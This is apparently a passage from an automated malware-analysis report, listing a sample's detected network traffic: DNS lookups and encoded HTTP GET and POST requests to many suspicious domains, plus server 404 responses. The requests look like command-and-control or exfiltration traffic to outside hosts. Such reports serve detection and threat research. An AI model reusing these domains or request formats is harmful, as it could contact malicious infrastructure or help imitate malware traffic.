          Source: global trafficHTTP traffic detected: GET /3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /31pt/?iS=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.yc791022.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /p3j6/?iS=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /hxi5/?iS=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.jcsa.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /j8pv/?iS=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.1secondlending.oneUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /swhs/?iS=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /8gp4/?iS=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.rgenerousrs.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /cpit/?iS=sqrCCcTnmzrg1P4sAk/QU75pr5UiXpEX3HrYYQRUrHENwAM+UA+gtHvn9s/6e57/pGZInJKN/XxZ2ntAsziA3/X4179OogJSAfxe5UAmetVNY4oSlmiuZpQ=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bpgroup.siteUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6+2TtVHAifM7eyMUHxFon7bcIQfzPiuuHPlbPirzhbYxLc+qoRY5lZ+tP99KhqilPg4uPHk5PRth/KSxs=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.aballanet.catUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /a42x/?iS=znfmxVkt4djGk3tmdywtQtJLNg3HiKZ6UNOVA1+QIiGE450155grImBaO89el+v6jlItDAosRwyNbj2dKq66Sb72cNgps88pEUX63gxtlS2fkXN4XLEQUlk=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.remedies.proUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /fev0/?Bi=zJ_w6yPG&iS=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.thaor56.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /98j3/?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.optimismbank.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /r3zg/?Bi=zJ_w6yPG&iS=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.greenthub.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /n2c9/?iS=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /uf7y/?iS=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bankseedz.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /31pt/?iS=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.yc791022.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /p3j6/?iS=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /hxi5/?iS=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.jcsa.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficDNS traffic detected: DNS query: babalharra.com.au
          Source: global trafficDNS traffic detected: DNS query: www.thaor56.online
          Source: global trafficDNS traffic detected: DNS query: www.optimismbank.xyz
          Source: global trafficDNS traffic detected: DNS query: www.greenthub.life
          Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
          Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
          Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
          Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
          Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
          Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
          Source: global trafficDNS traffic detected: DNS query: www.jcsa.info
          Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
          Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
          Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
          Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
          Source: global trafficDNS traffic detected: DNS query: www.aballanet.cat
          Source: global trafficDNS traffic detected: DNS query: www.remedies.pro
          Source: global trafficDNS traffic detected: DNS query: google.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: unknownHTTP traffic detected: POST /r3zg/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeHost: www.greenthub.lifeOrigin: http://www.greenthub.lifeReferer: http://www.greenthub.life/r3zg/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36Data Raw: 69 53 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6e 6e 6a 4a 45 2f 79 42 66 74 61 34 77 30 36 48 34 47 72 78 65 6b 6a 6e 4a 4a 72 54 65 79 6a 46 36 48 4b 6e 73 79 4d 32 71 7a 76 70 61 76 32 6d 4d 4e 39 78 38 78 36 66 46 6e 42 54 52 59 58 61 59 51 69 65 48 4d 4f 69 2f 35 6f 38 76 4d 35 78 73 6a 43 76 41 4e 56 78 76 65 64 53 77 33 46 38 43 32 4c 62 6b 6d 6f 5a 36 63 33 63 2b 71 35 6b 44 6e 68 55 37 64 44 64 5a 63 47 67 59 6e 6c 44 43 45 58 44 72 6d 4b 37 44 68 62 73 5a 6b 77 64 36 39 43 79 52 59 51 78 33 4e 38 41 77 4f 79 49 61 73 2b 59 38 45 73 4b 5a 48 58 4f 75 4f 55 45 54 35 78 59 41 51 3d 3d Data Ascii: iS=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyRYQx3N8AwOyIas+Y8EsKZHXOuOUET5xYAQ==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:55:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:55:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:55:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:55:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 02:55:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 02:55:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 